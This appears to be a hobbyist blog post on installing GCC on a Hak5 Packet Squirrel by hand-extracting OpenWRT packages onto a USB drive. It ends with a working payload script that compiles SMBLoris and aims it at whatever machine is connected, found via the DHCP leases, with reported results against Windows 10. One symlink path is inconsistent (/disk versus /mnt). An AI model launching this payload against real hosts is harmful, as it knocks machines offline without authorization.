Since the hardware footprint of the Packet Squirrel is so limited (2 MB for root filesystem / and 30 MB for tempfs /tmp) I have decided to find a way how to get GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.
I have attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as EXT4 /dev/sda1 partition
Disk /dev/sda: 7807 MB, 7807401984 bytes 250 heads, 5 sectors/track, 12199 cylinders Units = cylinders of 1250 * 512 = 640000 bytes Device Boot Start End Blocks Id System /dev/sda1 1 12199 7624372+ 83 Linux
/dev/sda1 gets automounted on /mnt upon boot so we can use this extra space for the GCC and other dependencies
Since I did not want to go through the cross-compilation on my x86_64 Linux machine to get the mips binaries I have downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop
https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/
The following packages are needed to get C code to compile natively on the Packet Squirrel
wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libbfd_2.24-3_ar71xx.ipk wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/libopcodes_2.24-3_ar71xx.ipk wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/objdump_2.24-3_ar71xx.ipk wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/base/binutils_2.24-3_ar71xx.ipk wget https://downloads.openwrt.org/chaos_calmer/15.05.1/ar71xx/generic/packages/packages/gcc_4.8.3-1_ar71xx.ipk
Once the packages are downloaded upload them via scp to the Packet Squirrel to the /mnt partition
scp *.ipk root@172.16.32.1:/mnt/
Login to the Packet Squirrel via ssh
ssh root@172.16.32.1 root@squirrel:~# mkdir /mnt/tt root@squirrel:~# mv /mnt/*.ipk /mnt/tt root@squirrel:~#
And here is what I did with each ipk package separately on the /mnt/tt
The below is pretty self explanatory, since the ipk is a Gzipped Tarball really
containing other tarballs.
root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz root@squirrel:/mnt/tt# rm -rf b2/ root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar ./debian-binary ./data.tar.gz ./control.tar.gz
We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction
root@squirrel:/mnt/tt# rm debian-binary root@squirrel:/mnt/tt# rm control.tar.gz root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar root@squirrel:/mnt/tt# mkdir libbfd root@squirrel:/mnt/tt# mv data.tar.gz libbfd/ root@squirrel:/mnt/tt# cd libbfd/ root@squirrel:/mnt/tt/libbfd# ls data.tar.gz root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz ./ ./usr/ ./usr/lib/ ./usr/lib/libbfd-2.24.so ./usr/lib/libbfd.s root@squirrel:/mnt/tt/libbfd# ls -la drwxr-xr-x 3 root root 4096 Jul 14 02:11 . drwxr-xr-x 7 root root 4096 Jul 14 02:10 .. -rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr root@squirrel:/mnt/tt/libbfd# rm data.tar.gz root@squirrel:/mnt/tt/libbfd# cd usr/ root@squirrel:/mnt/tt/libbfd/usr# cd lib/ root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al drwxr-xr-x 2 root root 4096 Jul 14 02:11 . drwxr-xr-x 3 root root 4096 Jul 14 02:11 .. -rwxr-xr-x 1 root root 935260 Jan 31 2016 libbfd-2.24.so lrwxrwxrwx 1 root root 14 Jul 14 02:11 libbfd.so -> libbfd-2.24.so
Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition
root@squirrel:/mnt/tt/libbfd/usr/lib# pwd /mnt/tt/libbfd/usr/lib root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr /lib/libbfd-2.24.so root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/libbfd-2.24.so /usr /lib/libbfd.so
We repeat the same process for the following packages
binutils_2.24-3_ar71xx.ipk objdump_2.24-3_ar71xx.ipk libopcodes_2.24-3_ar71xx.ipk
Once we are done with these we can finally move on to the extraction of GCC ipk package
root@squirrel:/mnt/tt/gcc/usr# ls -al drwxr-xr-x 5 root root 4096 Jul 14 02:06 . drwxr-xr-x 3 root root 4096 Jul 14 02:39 .. drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin drwxr-xr-x 3 root root 4096 Jul 14 02:06 include drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib root@squirrel:/mnt/tt/gcc/usr/include# ls -al drwxr-xr-x 3 root root 4096 Jul 14 02:06 . drwxr-xr-x 5 root root 4096 Jul 14 02:06 .. drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++
So we create a complete directory symlink to /mnt/tt/gcc/include
from /usr on the root filesystem of Packet Squirrel like so
root@squirrel:/mnt/tt/gcc/usr/include# ls -la include lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/
Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory
root@squirrel:/mnt/tt/gcc/usr/lib# ls -al drwxr-xr-x 3 root root 4096 Jul 14 02:06 . drwxr-xr-x 5 root root 4096 Jul 14 02:06 .. drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc root@squirrel:/usr/lib# ls -la gcc lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/
So by now you should have a fully working GCC compiler on the Packet Squirrel , you can try run/compile some code (SMBLoris.c for example) that you scp to the device
root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v Using built-in specs. COLLECT_GCC=./gcc COLLECT_LTO_WRAPPER=/mnt/tt/gcc/usr/bin/../lib/gcc/mips-openwrt-linux-uclibc/4.8.3/lto-wrapper Target: mips-openwrt-linux-uclibc Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc-0.9.33.2/gcc-4.8.3/configure --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl=https://dev.openwrt.org/ --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft Thread model: posix gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin#./gcc /mnt/smbloris.c -o /mnt/smbloris
The smbloris.c is taken from Hector Marcan’s github here https://gist.github.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e#file-smbloris-c
The following Packet Squirrel code can be used to launch SMBLoris attack from this device onto the local network on which it is connected, set it to switch 1/2/3
# Show SETUP LED
LED SETUP
# Set the network mode to NAT
NETMODE NAT
sleep 5
# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max
# Get the IP address for the connected target machine
ip="$(cat /var/dhcp.leases | awk '{print $3}')"
# Execute smbloris against the target IP
/mnt/smbloris eth0 1.1.1.1 255.255.255.254 $ip &
I have tested this against the latest Windows 10 64bit version 10.0.16299.19 on a physical hardware, the CPU gets to 100 %, memory jumps high as you can see on the video below
Im sure there might be some other tools that can be used in a similar manner (Exploit code written in C for example and compiled on the Packet Squirrel.. the possibilities are endless)
Nevertheless this was a fun exercise